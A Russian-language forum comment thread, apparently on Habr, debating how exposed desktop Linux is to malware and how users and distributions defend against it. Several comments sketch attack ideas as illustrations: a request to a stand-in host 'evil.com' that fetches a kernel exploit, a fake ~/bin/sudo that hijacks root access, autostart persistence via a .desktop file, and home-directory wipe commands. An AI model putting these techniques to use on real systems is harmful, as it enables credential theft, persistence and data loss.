Pull to refresh

Comments 262

Что бы вирусописатели начали активно писать вредоносный код под линукс он должен быть чертовски популярен, это раз.
Пользователи linux обладают знаниями для выявления вирусов и удалить их не составит труда.

Да и врядли те кто сейчас пользуется линуксом настолько глупы что бы ходить по сайтам megapornosait.com
Загрузка софта происходит из официальных репозитариев что исключает появление там вредоносного кода.

Т.Е. всё написанное конечно хорошо но бум вирусов под лиункс не светит нам
Пользователи линукс обладают знаниями? Правда?

Расскажите это мамочкам, которых заботливые сыновья пересадили на убунту, потому что она круче и антивирус не нужен.
сомневаюсь что взламывать комп такой мамочки комуто нужно, чтобы украсть пароли от однокласников не нужно ломать систему.

И посчитайте сколько таких вот «мамочек» от числа общего числа линуксоидов? а самих линуксоидов то не так много.

Винда намного выгоднее с точки зрения компьютерного злодея: ниже IQ пользователей, дырок больше, фиксы реже и тп.
Нужно, и взламывают, а потом от имени этой «мамочки» рассылают спам и прочий шлак (в том числе вирусный) другим пользователям. Всё в автоматическом режиме.
Когда-то давно(в октябре 2004) редакция CHIP проводила тест на саму защищенную операционку.3 претендента Mac OS(10.3.3),WinXP SP2 и Linux(SuSe 9.1 prof).Перепечатывать не имеет смысла, но суть такова, что при своевремменом и регулярном обновлении WinXP считалась самой защищенной.Времени прошло очень много с тех пор, но обновления для win вроде выходят чуть ли не каждый день даже сейчас.
пфф. Ну попробуй сломать мой мак, у меня наружу смотрит только ssh. все сервисы для лично пользования на локалхосте, соедениние с другими моими маками осуществляется через ipsec (спасибо me.com). Любые действия админитратора требуеют пароль администратора, все настройки заблокированы, к Keychain дается доступ только к заранее разрешенным приложениям (приэтом использую несколько связок, чтобы скомпроментировав одну связку, не отдвать все остально), если приложение изменяется доступ к связке запрещается. После 10 минут простоя keychain закрывается опять до востребования.

теперь о сервере:
стоит фряха, наружу много портов открыто (из них больше половины пробрасывается в корпаративную сеть). в кроне висит freebsd-update. на почту сыпятся SA. каждый вход систему или использование sudo отправляет мне месейдж в жаббер. чтобы подменить $PATH для этого надо как-то попасть в систему, а такие уязвимости редкость для подобных системах. sudo не запрашивает пароль только на определенные список приложений.

p.s.
нет я не параноик, я просто люблю защищать свои приватные данные от не своих глаз.
«Даже если вы абсолютно уверены в том, что у вас мания преследования, это вовсе не значит, что за вами не следят» :)

P.S. Ничего личного, просто вспомнилась цитата :)
вы не првильно написали… «даже если у вас нет паранои, это не значит, что за вами не следят» как-то так. на настройку всего этого над десктопе у меня ушло минут 10 (еще забыл про filevault расказать :) ), я дольше воллпепер выбирал.
Да, в самом деле у кого с чем проблемы :)

Осталось написать обширный пост про выбор обоев :)
Эмм… хочу такую же, можно ссылку на первоисточник?
UFO just landed and posted this here
Скажите, а для чего вы используете freenet? Я как-то ставил, игрался, но дальше не пошло.
точно так же. правда у меня там есть пару знакомым которым сыкотно некоторые темы обсуждать за пределами фринета.
Как вы реализовали отправку сообщения в джабер при входе в систему?
Наверное, через .login|.profile|.bash_profile, или что у него там настроено в качестве шелла.
UFO just landed and posted this here
Я так понимаю, речь идёт о среднестатистическом пользователе, а не гике-параноике.
Насколько я помню, именно от программных эксплоитов и выполнения вредоносного кода через дыры в приложениях Мак ОС 10 защищена намного хуже Винды — у Майкрософт большой опыт в деле латания дыр :)
большая часть ПО в base system заимствована из bsd, и разработка спонсируется apple. только вот в винде получить доступ администратора намного проще чем в макоси в базовой установке. И я не гин-параноик, просто кликнул в пару мест.
UFO just landed and posted this here
Еще можно вспомнить SELinux, или Grsecurity.
через что отправка в джаббер реализована?
sendxmpp, он есть в портах. отправляет все что удого, что можно передать в pipe.
ладно мамочки и иже с ними. я сам, уверен, на долгое время смогу приютить у себя зловреда, не обнаружив его. Если в винде я уже знаю откуда ожидать подвоха, как защищаться и при необходимости выкорчевать зловреда руками, то моего годового опыта с десктопным линуксом явно для этого не достаточно. Успокаивает меня пока одно, что даже при всём обилии зараз под винду, при активном сёрфе в винде без антивирусов я умудряюсь их обходить стороной.
Вопрос очень актуальный с учётом приличных темпов одомашнивания линуксов.
>Если в винде я уже знаю откуда ожидать подвоха, как защищаться и…
— так же и пользователь линукса знает, откуда ожидать подвоха. а если это мамочка, то я имею в виду ее сына, который ей поставил систему.
я сам пользователь линукса, если это не понятно из коммента. Не совсем дуб, но эффективно пользовать grep, awk, lsof, etc не умею. Ну не было времени у меня докурить маны. С удовольствием восполнил бы пробелы если найду адекватную к восприятию литературу на эту тему.
навскидку, самое банальное:
вы не знаете, что не надо работать под рутом?
вы не читаете, зачем система просит пароль, если она его вдруг просит?

а когда линухи станут более популярны, будем учиться дальше. я, например, зашла в этот топик, чтобы почитать, что скажут умные люди в комментах. и таки почепнула кое-что:)
знаю, но это не панацея. вирус и в юзермод может нагадить, а для этого не нужны рут права.
конечно я не ломлюсь скачивать и ставить всякую ерунду, но у меня нет уверенности, что рано или поздно браузер, через какую-нить дырочку не сохранит *.desktop файл в автозагрузку с запуском env python ~/.virus/virus.pyс и ему не понадобится chmod +x при этом, а там и привилегии поднять можно попытаться.
Разные дистрибутивы и ядра — скажет кто-то. GET evil.com/get0day?uname=2.6.31-16-generic+%2352-Ubuntu+SMP+Thu+Dec+3+22%3A07%3A16+UTC+2009+x86_64+GNU%2FLinux — скажет малварь.
а ещё я обычный юзер и хочу, чтобы у меня работал ТВ-тюнер. Для этого я добавляю некий ppa для решения проблемы.
Теперь убедите меня, что администратор этого PPA не может «поделиться» доступом к нему, через какую-нибудь CSRF.
А дальше всё просто: апдейт в репозитории — и у меня живёт «друг» о котором я не подозреваю.
Конечно же это не червь и сам он особо не распространится (хотя по ssh в known_hosts я думаю он пройтись не поленится), но когда я лишусь своего ящика на gmail и всех сопутствующих учёток, мне уже это будет не интересно.
UFO just landed and posted this here
В PPA пакеты легко добавлять, но за ним следят, и троянец просидит там до первой же жалобы, то есть совсем недолго.
Фигню пишете. Даже самый десять раз опытный пользователь может и не заметить, что у него команда «sudo su -» ссылается на вирусный ~/bin/sudo, а не на системный /usr/bn/sudo.

Дырки в софте никто не отменял. Ссылки типа «вот моя фотка, зацени www.site/foto.sh» вполне проканают
да поймите что вы искусственно привязываете ситуацию к linux системе. Это все возможно и на windows и на mac. Почему именно linux?
Блин, а в статье речь о чём? Именно об этом!
>вот моя фотка, зацени www.site/foto.sh

Ага и инструкция снизу с chmod +x foto.sh && ./foto.sh =)
мне на .jar приходят частенько ссылки, а они мало того, что кроссплатформенные, так еще и не требуют вышеозначенных действий.
Зато требуют установки программы весом в 20 мб.
Нет, честное слово. Вообще не очень часто мне приходится сталкиваться с Java, ведь Java еще не столь популярна как тот же самый Flash. Но разве у Java нет встроенной системы безопасности, которая не дает приложениям делать то что им не нужно?
UFO just landed and posted this here
Будут ограничения того юзера, под которым запущена JVM. А в линухе, я так думаю, люди под рутом не сидят и читают, нафига у них система пароль спрашивает.
Пусть не под рутом, но вирус уже поселится. И как написали в стать заменит собой sudo, будет ждать пока пользователь не выполнит чтото от рута, и все.

И к тому же для рассылки спама, ддоса, перебора паролей и пр. должно хватить прав и обычного пользователя.
Ну, в данном треде обсуждается уже скорее пример социальной инженерии и он мало имеет отношение к безопасности ОС.
А что, вы думаете он прям так и запустился? А по-моему +x ему тоже не помешает, это если binfmt настроен правильно, а так запускать придется через скрипт же.
кстати да, jar надо или через java -jar или binfmt, но тогда x-флаг должен стоять.
В бунте, кстати, binfmt идёт настроенный, а вот явы по умолчанию нет. и ff вроде как не сохраняет файлы с +x, или я неверно помню?
«Консоль в современных юзерсфрэндли дистрибутивах, как мифическая точка G, все знают, что она есть, но найти её очень сложно.» (с) bash.org.ru

Сейчас приходится лазить по менюшкам в поисках консоли. А когда linux достигнет той популярности на desktop-системах, при которой будет иметь смысл писать вирусы, консоль может быть вообще будет возможно вызвать только через single mode.
Лазить по менюшкам не приходится. Если вдруг linux деградирует до описанной вами стадии, уйду на *bsd или OpenSolaris, подозреваю, что большинство теперешних ползователей тоже. Так что к тому времени «проблема вирусов в linux» нынешних пользователей этой системы волновать не будет.
Никто не говорит, что именно так и будет. Просто дистрибутивы вроде Ubuntu именно до такого уровня и опустятся.
Вы, по всей видимости, счастливый обладатель машины времени, раз так смело утверждаете. Но что-то вот user-friendly Mac OS X позволяет запустить Terminal и не в Single. Он лежит себе спокойно в Applications/Utilities.
Ты Убунту то видел? Или только на картинках? О безопасности там много думают и в нужную сторону
OpenSolaris — одна из немногих nix-ОСей, с которую я держал в руках. Консоль не понадобилась, так что даже искать не стал :)
Видимо вы не пользуетесь консолью, вот и ищите. У меня это F12.
win+ — т — первая выдача gnome-do, ну или тильда, для чего-то быстрорастворимого. В гуях удобственно жутко.
UFO just landed and posted this here
alt-1 на десктопах, ctrl-1 на нетбуке (там по альту никак не научусь попадать) :)
yakuake/guake тоже рулят. :) Особено где-то с 20% прозрачности.
«вот моя фотка, зацени www.site/foto.sh» — такое канает независимо от системы))
а тут вроде конкретно о *nix
Это был пример того, что и «классические» методы тут вполне работают.
Да в том то и юмор, что не работает это. Чтобы это сработало, у вас в системе файлы с расширением sh должны открываться интерпретатором. Я сомневаюсь, что такая настройка включена.
А что толку от этой ссылки? Это же не windows. Файл сохранится без права на выполнение. При его открытии система услужливо запустит блокнот или спросит что с этим файлом делать.
UFO just landed and posted this here
Загрузка софта происходит из официальных репозитариев что исключает появление там вредоносного кода.

Вы в этом уверенны, что там исключено появление вредоносного кода?
habrahabr.ru/blogs/linuxnotforall/77838/
это не официальный репозитиорий
Не думаю, что хотя бы четверть пользователей Linux знают, как найти или удалить вирус.

Естественно, если это Linux с Иксами.
В любой ОС если иметь необходимые права можно спрятаться так что тебя никто не найдет. В linux, действительно, таких способов больше, но это никак не ухудшает безопасность линукса в сравнении с windows.

Когда такая проблема станет актуальной напишут «дружелюбный» chroot в котором будут выполнятся все новые программы и будет всплывалка с вопросом о разрешении каждого действия как в виндовс, но это уже борьба с последствиями, безопасность начинается задолго до того как вредоносный код будет запущен и во многом лежит на плечах пользователя. Безопасность системы дело рук пользователей :)
В чруте тоже можн замечательно нагадить.
я не говорил о чистом chroot, но тем не менее что плохого можно сделать в чрут с не root правами?
ну развеж это плохо? в чруте, в песочнице при запуске начнет спамить — в топку такой софт :)
Это если вовремя понять, что оно спамит. А можно ведь и не заметить.
Netstat что ли сложно разок глянуть, раз уж софт в песочнице запускаете
Мамочке вывести монитор сети в панель и сказать смотри — если ты кино не качаешь, а вот тут у тебя всё жёлтое, значит кричи караул.
Как вы правы! Я совершенно серьезно, без всякой иронии!

Грамотное организованное оповещение о неполадках или несанкционированном доступе — это очень нужная вещь.
так и я, собственно, без шуток)
А ещё можно прикрутить мониторинг tcp/ip с отсылкой лога себе на почту и наблюдать за состоянием аплоада. Ну, это уже для эстетов.
В принципе и в виндах подобное есть, но там это покрыто всё тайнами.
Штатных и при этом наглядных вещей, пожалуй, нет. А сторонние, ZoneAlarm, например — вполне. И кричит, если что не так, и индикаторами расхода трафика мигает :)
Описанное здесь применимо лишь к случаю «одного пользователя». т.е. если и появится какой-то «вредитель» и попытается проделать все описанное выше (в том числе и rm -rf ~/), то навредить получится лишь тому пользователя, который запустил этого «вредителя» (тут как говориться «сам виноват!»). Остальные же пользователи не пострадают, если конечно пострадавший пользователь не был root. :-) Если же вы пользуетесь root'й учетной запись в системе(что по определению не безопасно), тут вам уже ничего не поможет.
А вообще я бы посоветовал backup'пить все критические данные и не когда «сидеть» под учетной записью root, тогда вас никто не страшен!
все что написано выше применимо к любой операционной системе.
в винде не поможет. многое ПО требует админские права. А каждый раз давать эти права всем лень :)

p.s.
повесил проверку $PATH на изменения
Да из современного ПО — уже немногое. Народ одумался :)

Раньше да, проблема была серьезная.
А какая разница для десктопа, удалены данные одного пользователя или система? Время восстановления системы без учета ~/ — десяток минут.
А время восстановления удаленных данных?
Зачем восстанавливать систему? Система не скомпрометирована. А вот пользовательские данные — самая важная часть — уже всё, тютю.
«Самая важная часть», обычно, имеет бекапы, число и регулярность которых прямопропорционально важности этих данных.

Иначе выходят «взаимоисключающие параграфы».
мне не будет легче от того, что кроме юзера roman на компе будет ещё какой-то юзерь pasha, vanya или petya и при этом я сделаю sudo rm -rf ~/. Уже лучше систему бы снесло, чем мои данные. и это кстати, реальный случай. После этого я дропбокс поставил :)
Линукс в плане устойчивости системы от сбоев, а также в возможностях восстановления в случае, если они произошли, намного лучше продуктов от Микрософт (если пользователь соблюдает элементарные правила безопасности и не работает под рутом).

Однако, остается проблема уязвимости от утечек личных данных (адресной книги, писем, документов). Ведь с ростом возможностей того же браузера, растет и возможности скриптов, которые выполняются в его окружении, в том числе и зловредных. Браузер становится чем-то вроде операционной системы.

Защитить личные данные в ОС, что в Линуксе, что в Виндовз, одинаково сложно, и вряд ли это возможно сделать с высокой степенью надежности штатными средствами.
отсутствие IE счастье линуксиодов :)
Вот так вот, скажешь что-нибудь про Линукс и сразу минус один, для кармы лучше петь хвалебные оды Биллу :)

Ок. Еще один сильный фактор на стороне Линукса это его открытая архитектура, которая базируется на разработках 60-х и за время своего существования была проинспектирована тысячами разработчиков/исследователей из самых различных школ и направлений.
какие «остальные пользователи»? PC — на то и PC чтобы быть персональным, особенно если это ноут
rm -rf ~/ не уронит систему, но для меня будет неприятной командой
И еще:
1) просто пользователь не может писать в /usr/bin не имея специальных прав;
2) у каждого пользователя свое переменное окружение
Прочтите внимательно статью, там специально упоминается, что вредительство в локальном каталоге пользователя. И что в этом случае вредительство не становится менее действенным.
Я считаю потенциально опасным компрометирование целевой системы, что не возможно (при отсутствии открытых дыр!) в описанной вами ситуации.
А проблема вредительства пользователю, как я писал уже выше, решается методом backup'a критически важной информации.
Бэкап не спасает, в бэкапе замечательно может сидеть вирус тот же самый. А пользователь — работать и не подозревать, что у него вся инфа постоянно сливается.
Зачем в домашнем каталоге держать исполняемые файлы?
После воостановления из бекапа можно убрать со всех файлов флаг выполнения.
И переустановить каталог ~/bin/ если таковой имеется.

В linux невозможно положить вирус в папку чтобы он запускался при открытии этой папки, под виндой такие чудеса катят. :(
В каком-нибудь новомодном DE запросто такая фишка может быть. Те же самые превьюшки для каталогов в файлменеджерах. Никаких отличий от винды по сути.
А если без «если»?
Приведите хоть один конкретный пример!
Для этого есть всякие SELinux и AppArmor, разве нет?
Безусловно, но они пока для персонального использования непригодны.
отчего же? давно во всех популярных дистрибутивах по дефолту работают, а в федоре вообще защиту сотен процессов по дефолту прописали
AppArmor это и есть SELinux =), только упрощенный. Также как и suse-брандмауэр это надстройка над iptables =)
AppArmor и SELinux это две различные, конкурирующие технологии со своими достоинствами и недостатками.
Да, selinux даже позволяет разрешать приложениям только какие-то сетевые подключения, то есть тот самый случай со спамом из chroot, selinux способен зарезать.
Описанные в статье проблемы есть в любой ОС.

Автозапуск — В Windows можно найти не меньше способов. HKCU\Software\Microsoft\Windows\Run, Пуск — Автозагрузка, различные надстройки для IE, хелперы для контекстных меню в проводнике, хелперы для страниц свойств и т. д.

PATH — В Windows тоже есть. Просто консольных маньяков меньше. Более точный аналог — поменять путь к исполняемому файлу в ярлыке. Мало кто запускает напрямую из каталога Program files.

rm -rf ~ — del /s /f /q c:\users\username\documents (или какой там путь)

Стандартность путей конфигов — о да, а в других ОС они разве нестандартные? %appdata%\Opera. Даже если сделать нестандартным, то браузер откуда-то берёт этот путь, а значит сможет и вирус. Никакой проблемы и нулевая защита в общем.
вот и я говорю, что это статья не про потенциальную «не безопасность» linux, а про возможные действия вредоносного кода! И актуально это для любой системы!
Речь не про windows, а про конкретные примеры, как это же самое можно сделать в линуксе. Чтобы развеять иллюзии о заведомой безопасности линукса.

Некоторые особенности именно что для линукса харакетрны, например, оперу ту же самую часть ставят не в профиль, а в каталог установки и профайл оперы лежит где угодно на диске, а вовсе не в C:\Users или подобных местах
Сразу скажу, что можно так и под линуксом поступить (с оперой), но это — не способ распространения приложения по умолчанию. По умолчанию именно пакетный с профилем в ~/.opera
Ваши предложения? убрать из системы вызов unlink и запретить удаление файла как такового в принципе? Думаю производители жестких дисков будут Вам очень благодарны, только вот пользоваться такой системой будет явно не просто.

Почти все что вы описали находится на уровне стандартных действий пользователя. У пользователя должна быть возможность удалять и модифицировать свои файлы, без этого он просто не сможет работать. Для этого есть утилиты и если он ставит себе какую-то левую — от этого никак не защититься автоматическими методами. Ваш вопрос можно допараноить вплоть до того, что линукс самая дырявая ОС в мире, когда юзер скачивает и запускает sudo destroymycomputer.sh. Что предлагаете делать? Да, я согласен, работать за компьютером, вообще — опасно.

какие средства защиты предоставляет виндовс и ПО под нее? фактически только одно — всеми способами пытаться ограничить возможность попадания таких скриптов на компьютер. Тем не менее, социальная инженерия все еще на месте, юзеры запускают вложения в почту и все антивирусы нежно сосут глядя на порнобаннер за СМС. Нет защиты от социальной инженерии, разве только ввести сертификацию юзеров для доступа в интернет, сдал экзамен — сидишь вконтакте, не сдал — играешь в пасьянс. А вот то чем фаерволы и антивирусы занимаются закрывая разные дыры в системе и несовершенства winapi, в общем-то, в линуксе по умолчанию во вполне адекватном состоянии.
Есть средства по предупреждению фишинга, они во всех уважающих себя браузерах стоят, в идеале вместо кидального сайта должна появлятся табличка, что этот сайт кидальный. Хотя в реальности народ часто забывает сообщить о вредоносном сайте куда следует. Но у него и кнопки это сделать обычно нет под рукой. Но в целом, пока интернет будет оставаться страной непуганых идиотов, всяким фишерам там будет раздолье. А это значит нужно повышать граммотность населения
Этим занимаются в основном не пользователи, которые должны сообщить, а интернет роботы индексаторы, тот же гугле определяет известные скриптовые вирусные сигнатуры и заносит их в фишинговые списки.

Но проблема то в топике о другом совсем. Проблема о том, что пользователь может установить себе SuperBrowser, который мало того что плюет на все фишинг листы, но еще и удаляет все содержимое хома, рабочего стола и вообще до чего доберется. Единственное что непонятно — как автор предлагает от этого защититься? и почему это привязано к Linux, хотя на деле относится к базовому компьютерному понятию фактически. Я бы сказал немного утрируя: Linux не безопасен, потому что пользователь установил Windows.
> Я бы сказал немного утрируя: Linux не безопасен, потому что пользователь установил Windows.

Я бы перефразировал как: «Linux не безопасен, потому что с ним работает пользователь, который перешел с Windows»
А пользователь, который привык устанавливать софт из официальных репозиториев меньше всего будет пытаться устанавливать какие-то SuperBrowser-ы :) и запускать всякие левые бинарные файлы
Ну не поставит он его в Линуксе, просто не осилит. Это же нужно руками пакет достать, отключить предупреждение об опасности, удостоверится, что все зависимости скачались, а если зависимостей не хватает то и вовсе облом.
А те, кто всё это осилят сделать, не побегут ставить супермегавасябраузер.
В общем вы не сможете эпидемию организовать, хоть убейтесь
Ну не поставит он его в Линуксе, просто не осилит. Это же нужно руками пакет достать, отключить предупреждение об опасности, удостоверится, что все зависимости скачались, а если зависимостей не хватает то и вовсе облом.
Что-то мне подсказывает, что если вредоносная программа попытается выдать себя за пакет с некой безобидной программкой, то там постараются не делать зависимостей вообще. Как раз, чтобы поставилась в максимуме случаев.
Чтобы профиль оперы лежал где-то отлично от ~/.opera и опера могла что-то туда писать — надо дать пользователю, который запускает ту самую Оперу права на запись в это нестандартное место (предположим, что это /tmp) но первая же перезагрузка убьет весь профиль и прочее барахло (если это опять-таки пресловутый /tmp). Давайте на вскидку вспомним краткий перечень каталогов, в которые может что-то записать непревелигированный пользователь?
И да, опера, на сколько я помню, из своих GUI не позволяет менять путь к профилю, разве что в config:opera или как это там называется. Но раз уж чувак долез до такого тонкого тюнинга, то мозгов на поиск и удаления вредноносного кода из системы у него хватит. Мама-домохозяйка явно оставит всё как есть. И никуда ваш оперный профиль из домашнего каталога не денется.
Я знаю что надо сделать! Надо запретить запускаемые файлы вообще и сажать в тюрьму за их написание, распространение и запуск
И, тем не менее, на данный момент самый популярный способ распространения вирусов под Linux: «О! Дай посмотреть!».
Это всё оттого, что этот же способ — пока самый популярный способ распространения и самого линукса :)

з.ы. а заметка как раз о том, что в плане локальной безопасности не нужно расслабляться. И отличий тут от других систем мало. Распространение вирусов на 99% обусловлено человеческим фактором, а не самой системой.
UFO just landed and posted this here
Если враг получил доступ даже к пользователю, то уже поздно пить боржоми. Это всёравно, что пытаться остановить уже проникнувших в квартиру грабителей. И это очень сложно, гораздо проще более хороший замок на дверь поставить. А надежность Линуксу серьезно повышает простота установки софта из репозиториев и сложность сделать тоже самое в их обход
Для выполнения `rm -rf ~/` надо иметь отдну не существенную мелочь, которая не ведома многим кто использует форточки — эта не значительная вещь права!

Из под обычного пользователя вирус не сможет воспользоваться rootkit механизмами и скрыть своё присутствие и как либо навредить или внедриться в систему. Максимум что он сможет сделать — это нагадить текущему пользователю.

А вот получение необходимых прав да и просто не санкционированный запуск в Unix-like и в Windows это небо и земля.

+к этому централизованные репозитории с проверкой подлинности пакетов.

Из предыдущего плюса вытекает еще один — чёткий контроль над изменением исполняемых файлов. Т.е. любую поврежденную программу (висусом или просто сбоем) можно без всяких проблем восстановить в первоначальное состояние.

Я считаю что разглагольствовать о безопастности это удел специалистов а не домохозяек.
Чисто гипотетически… я бы потратил много сил, чтобы взломать сервер с репозиторием и подменить файлы и чексуммы, а потом дать зеркалам с меня обновиться ;).
Вот это будет эпикфейл…
… будь я на месте вредителя, конечно )
ну так попробуйте, или там по вашему не проверяется что за файлы в репозитории и какого они там делают?
Чисто гипотетически помимо взлома зеркала еще нужно получить RSA ключ маинтейнера, тупая подмена пакетов на затрояненные — ни к чему не приведет.
При обновлении каждая система выдаст предупреждение безопастности и не установит не подписанные пакеты.
Чтобы не быть голословным — Отчёт о расследовании Debian взлома серверов (2003й! год)

Тогда еще кастати пакеты не подписывались.

Вообще вопрос сводится к тому «что проще сломать, как быстро это всплывёт и какие будут последствия»
ну так попробуйте взломать windows update и подменить патчи?

с репозиториями все не совсем так гладко, как может показаться. Преценденты их взломов в общем-то уже были, но навредить никому не смогли. Репозитории не так просты как Вам может показаться.
чувак, ~/ — домашний каталог, на удаление файлов внутри него у обычного пользователя права наверняка есть.
Ну да, домашний каталог пользователя снести можно. А толку? Проникнуть в систему и оставаться там не замеченным это не поможет.
Сейчас написание вирусов превратилось из баловства в бизнес, какой профит с удаоления пользовательской информации?
Пользователю без личных данных (годовой отчет, недописанный диплом, наполовину завершенный проект) будет офигенно весело конечно. Пофигу что несколько недель работы накрылось, зато система стоит!

Вы же не думаете, что среднестатистический пользователь компьютера покупает его только ради ОС?
Вирусописателю какой профит с того что пользователь убъёться об стену?
Предложит SMS отправить на короткий номер, до того как все снести.
Перезагрузить иксы зайти под другим пользователем и снести нахрен это горе блудной мысли.

Находясь под обычным пользователем у вируса очень мало возможности манипулировать и ставить свои условия — места автозапуска можно перещитать по пальцам, обнаружить и прибить процесс не проблема — чирикнуть он не успеет.

Напишите вирус который под линуксом не будет обнаружен и прибит в течении 5 минут, будет самостоятельно массово распространяться и делать что-то полезное (спам например рассылать или на пользователя палоьцы кидать) — тогда и поговорим.

Ах да, и чтобы к этому вирусу небыло ридми на несколько страниц с рассказом о том как им правильно заразиться.
есть такие вирусы, которые после получения рута (да, в линухе тоже проскакивают такие дырки) становятся прослойкой
между ядром и пользователем — возможность полного контроля ВСЕГО. А самое страшное — что обнаружить их крайне сложно. (про стандартные средства типа ps ax можете забыть). Если не достаточно продуманний — есть шанс установить его по количеству трафика выходного. (к-во выходного — к-во входящего на шлюзе).

Паранойя местами помогает )
Прикатит с обновлением новое ядро или любой важный компонент и гудбай вирус.
Вы правда верите что _МАССОВЫЕ_ эпидемии вирусов эксплатирующих подобные уязвимости возможны?

Такие «подарки» появляются достаточно редко и латаются очень оперативно. Обычно дырки очень специфичны и ограничены кучей дополнительных условий, по этому подходят лишь для целенаправленного квалифицированного взлома.

Последняя массовая дыра в линуксе которую я помню — это дефолтные пароли «admin/admin» на домашних маршрутизаторах, но это все равно что жаловаться на ненадёжность стальной двери не запирая её при этом.
Где они такие есть? Пруф пожалуйста.
а вот это у них надо спросить. пишут вирусы just for fun видите-ли.
под винду же пишут.
В последнее время мне встречались вирусы которые тупо трут пользовательские данные. Может кинети линки на описание хотябы парочки, которые появились за последний год?

Насколько я знаю львиная доля вирусов — это трояны для создания ботнетов или блокирующие экраны с требованием отправить СМС.

И то и другое под линуксом удалить на ап-чхи! Да и не совсем понятны пути проникновения (массового)
Ну ок, не сотрет а зашифрует домашнюю директорию и попросит отправить СМС… Это уже проблема и прибивать такой вирус толку особо нет
Знаете, без палева зашифровать энное количество гигабайт информации — это умудриться надо.

Т.к. без рута невозможно дать прозрачный доступ к зашифрованным данным, чтобы они выглядели как не зашифрованные (пока вирус работает)

Увы и ах…
А на счет бизнеса — выше красивый баннер нарисовали — угроза то вполне реальной может быть.
Тупые домохозяйки как поставят Kaspersky Anti-Virus for Linux Workstations и будет им счастье, если у них нет ума что бы понять что можно запускать, а что нельзя — пусть за них это делает антивирус.
Собственно, создание подобного продукта и есть логичное решение проблемы.
Ну продукт давно создан и даже неплохо продается, к лету будет новая версия, так что все в порядке!
Come into the Green Zone. ;-)
Хорошей практикой является хранение своих конфигов в SVN или любой другой системе контроля версий с коммитами по крону. При этом репо не в пользовательской среде, а, желательно, вообще на удаленном серве. Но такое позволить себе могут далеко не все, да и проблема лени (у самого никак руки не дойдут). При этом можно гораздо проще видеть что было нагаженно в конфигах и элементарно откатить. Не говоря уже о восстановлении системы после переустановки / упрощенный перенос конфигов на другой комп.
давно изобрели github и bitbucket, у второго даже бесплатный план есть. это может позволить себе кто угодно, даже я!
бесплатный план везде есть.
а на Launchpad еще можно создавать ветки вне проектов, для себя.
*links *free *git на хабре подсказали бесплатный приватный хостинг git и svn. С багтрекером и прочими блекджеками. unfuddle.com
juick.com/157321
о, спасибо. другой вопрос, меркуриал такой красивый под виндой в сравнении с гитом, что я даже из под линукса его использую :)
1)зачем приватный? конфиги публиковать надо.
2)где на BitBucket приватный?
3)зачем все это, если есть Dropbox?
1. зачем их светить-то всем? может у меня среди скриптов начальных порнуха качается, а я не хочу адресов сайтов палить
2. зайди да посмотри, приватный репозиторий дается тебе бесплатно
3. дропбокс не хранит историю или платный
1. ну не все конфиги вообще бекапить нужно. Emacs'овые вполне себе публикуют.
2. да, точно, есть.
3. историю хранит бесплатно, но не особо с ней управляется.
Однако, что мешает сделать bzr init в ~/Dropbox/configs и делать локальные коммиты? Самое лучшее решение.
что это?
ЗЫ только не говорите что это водопад :D
Я как бы намекаю на скринсейвер-троян, о котором тут писали. И на то, что рассматривать человеческий фактор при сравнении операционок — глупо.
UFO just landed and posted this here
А ещё стоит не забывать что очень скоро самым популярным десктопным линуксом вполне может стать гугло-ось, в которой и цифровые подписи на всё что можно, и хром.

Не драматизируйте.
Суть поста не ясна:) Да! под линукс можно писать вирусы, но чего боятся то??? Здесь все дело в уровне знаний пользователей, из которых словить вирус могут только новички или «мамочки которых пересадили на убунту» с новичками все понятно, со временем разберутся, а с «мамочками все еще проще» не знает пароля — не сможет установить вирус:)
«Уровень знаний» — это миф, и весьма вредный миф. Чтобы обезопасить дом, мы ставим во всех дверях надёжные замки, а не оставляем пустые дверные проёмы со словами «уровень знаний защитит». Винда — это отличный пример наступания на грабли безопасности, и этими ошибками нужно пользоваться, чтобы предупредить их на линус-системах. Я не вижу никаких потенциальных препятствий для реализации защиты «от дурака», в винде это невозможно по историческим и архитектурным причинам, однако в линуксах всё ещё впереди и можно, а даже нужно такое реализовывать. Контроль целостности пользовательских файлов — это именно защита от дурака. Первый и главный рубеж обороны, который способен отсечь огромное количество вредоносного кода сразу.
Я с вами не совсем согласен, на самом деле уровень знаний весьма и весьма полезен, вот только у меня нет желания объяснять почему, сравнение с виндой по моему лишнее. А защита от дурака на мой взгляд реализована в линуксе на высоте, все что для этого нужно сделать — не говорить дурокам пароль, и никакой вирус уже не сможет ничего модифицировать.
Я и не говорил, что уровень знаний бесполезен. Я говорил, что он излишне мифологизирован. И у многих пользователей он явно недостаточен, но это вовсе не значит, что этих пользователей нужно посылать куда подальше.

> А защита от дурака на мой взгляд реализована в линуксе на высоте, все что для этого нужно сделать — не говорить дурокам пароль, и никакой вирус уже не сможет ничего модифицировать.

Так я и привёл примеры, показывающие, что никакой защиты от дурака нет. Во многом защита основана на том, что у пользователя нет прав писать в системные файлы. Но в остальном — те же проблемы, что и в винде, плюс чуток специфичных для линукса.
Если операционная система станет действительно популярной, то уровень компьютерной грамотности среднего пользователя резко снизится. И это нужно иметь ввиду.
Да уже счас ходят вирусы, ломающие Линуксы на роутерах, алгоритм простой: ущутся идиоты, которые ставят пароль в духе admin admin на ssh доступ к роутеру и открывают его во внешний мир.
Но Линукс тут явно не причем.
Кстати что ещё затрудняет вирусописание, так это количество поддерживаемых процессорных архитектур. Придется по 5 версий вируса делать. То есть в конечном итоге вирусы реально делать только скриптовые.
Тут дело скорее в настрйках роутеров по умолчанию, которые массовые пользователи оставляют As Is просто помтому, что не досуг им что-то там менять (а произхводитель об этом не подумал). И чем массовее система, тем масштабнее такие явления.

И зачем писать 5 версий? Достаточно одной-двух для самых распространенных систем. А если и пять — было бы желание.
UFO just landed and posted this here
А автор комментария вообще пост читал? Причём тут права доступа? Вирус работает в пространстве пользователя, он без проблем может писать во все пользовательские файлы.
UFO just landed and posted this here
Что за фигня? Какой system32? У пользователя НЕТ прав писать в системные каталоги, это в самом начале указано, этот вопрос даже не обсуждается в этой статье.

Про прямые руки — это опять же фигня. Вирусы пролазят сквозь дыры, сквозь дуры («Ой, а я на твоём компьютере хотела фотку посмотреть, а она не октрываеться!») и так далее. От этого никто не защищён, однако первый рубеж обороны, который сразу отсекает огромный класс вирусов, сделать можно, о чём, собственно, речь в статье и идёт. А линукс тут при том, что в винде по причине её архитектурной кошмарности и тяжеловесности, сделать такое нереально.

И ещё раз напомню, речь идёт про ЮЗЕРСПЕЙС. Никакие самодеятельные способы «надёжного хранения» никак не помогут сохранить данные от программы, работющей в том же пространстве и с теми же правами, что и пользователь.
UFO just landed and posted this here
